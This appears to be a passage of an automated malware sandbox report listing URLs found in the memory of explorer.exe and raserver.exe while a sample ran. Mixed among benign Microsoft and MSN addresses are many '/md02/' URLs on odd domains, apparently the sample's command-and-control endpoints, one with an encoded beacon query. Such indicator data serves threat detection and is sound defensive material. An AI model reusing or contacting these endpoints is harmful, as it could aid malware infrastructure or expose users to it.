                                                                                                            http://www.z8ggd.comReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.attorney-services-8344642.zoneexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.webuyandsellpa.comexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://www.rakring.comReferer:explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW-darkexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.pngexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://excel.office.comexplorer.exe, 00000004.00000003.8623027004.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11896448781.0000000010A85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286306641.0000000010A43000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6857495261.0000000010A43000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.attorney-services-8344642.zone/md02/www.yeslabs.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_Inexplorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiqexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://www.rslotrank.win/md02/www.hecxion.xyzexplorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://www.webuyandsellpa.com/md02/explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://www.piedge-taiko.netReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://www.msn.com/en-us/news/crime/dick-van-dyke-forever-young/ar-AA1lDpRDexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.coinbureau.xyz/md02/explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://www.localhomeservicesadvisor.comReferer:explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://ns.advexplorer.exe, 00000004.00000002.11883777705.000000000441B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6844442459.000000000441B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://www.piedge-taiko.netexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.rslotrank.winReferer:explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://www.pittsparking.comReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.woby.xyzReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.msn.com/en-us/news/us/trump-repeats-false-claims-that-children-are-undergoing-transgendeexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.equipoleiremnacional.comexplorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.pittsparking.com/md02/www.hecxion.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://wns.windows.com/explorer.exe, 00000004.00000003.8285449351.0000000010BEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6858022237.0000000010BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287825721.0000000010C9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11897707281.0000000010C91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286577674.0000000010C83000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.tigajco69.funexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-darkexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://www.webuyandsellpa.com/md02/?all=e9dCEAefob0qfIp2qzYjc8hnpuRDR3iBtFDetlkNhl3JkGKef1d6ICtGRMuexplorer.exe, 00000004.00000002.11899785830.000000001444F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.0000000005A3F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#kHslwiV2w6.exefalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.hecxion.xyzReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://www.localhomeservicesadvisor.comexplorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://www.msn.com/en-us/weather/forecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2xhcmEiLexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://www.webuyandsellpa.com/md02/www.coinbureau.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://www.msn.com/en-us/money/markets?id=a6qja2explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://www.msn.com/en-us/tv/news/the-bold-the-beautiful-young-and-the-restless-more-get-premiere-daexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://www.j3k7n.xyz/md02/www.upcyclecharms.comexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://www.equipoleiremnacional.com/md02/explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://www.qqkartel88v1.com/md02/explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://www.pittsparking.comexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://www.hecxion.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://www.msn.com/en-us/money/personalfinance/18-everyday-household-items-that-are-surprisingly-vaexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.svgexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://www.rakring.comexplorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://www.vizamag.com/md02/www.tigajco69.funexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://outlook.comexplorer.exe, 00000004.00000003.8623027004.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11896448781.0000000010A85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286306641.0000000010A43000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6857495261.0000000010A43000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppfexplorer.exe, 00000004.00000003.8288746486.000000000D56B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6853066858.000000000D56B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11893982088.000000000D56B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://www.glamour.com/story/shag-haircut-photos-productsexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://www.tigajco69.fun/md02/www.zruypj169g.topexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://www.localhomeservicesadvisor.com/md02/www.saeutah.comexplorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                https://www.msn.com/en-us/news/politics/6-things-to-watch-for-when-kamala-harris-debates-donald-trumexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  https://www.msn.com/en-us/entertainment/news/james-earl-jones-dies-at-93-all-about-his-son-flynn/ar-explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    https://www.msn.com/en-us/news/crime/tyreek-hill-s-traffic-stop-shows-interactions-with-police-can-bexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      http://www.upcyclecharms.comexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        https://www.msn.com/en-us/health/medical/2-egg-brands-have-been-recalled-due-to-a-serious-salmonellaexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zkHslwiV2w6.exefalse
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000003.8285449351.0000000010BEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6858022237.0000000010BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287825721.0000000010C9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11897707281.0000000010C91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286577674.0000000010C83000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              http://www.upcyclecharms.comReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDkX-darkexplorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                  http://www.zruypj169g.topReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                    http://www.attorney-services-8344642.zone/md02/explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                      http://www.jalaios10.vip/md02/www.chiri.latexplorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                        http://www.andrewghita.comexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                          http://www.pittsparking.com/md02/explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                            http://www.yeslabs.xyz/md02/explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                              http://www.andrewghita.com/md02/www.attorney-services-8344642.zoneexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                http://www.qqkartel88v1.comexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                  https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disapexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                    http://www.saeutah.com/md02/explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                      https://api.msn.com/sports/blended?market=en-us&satoriid=3e4b6c3b-d87a-8603-8e90-e93f0f328660&user=mexplorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                        https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000004.00000002.11890837892.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6852064723.000000000CE47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowIexplorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                            http://www.chiri.lat/md02/explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              		unknown
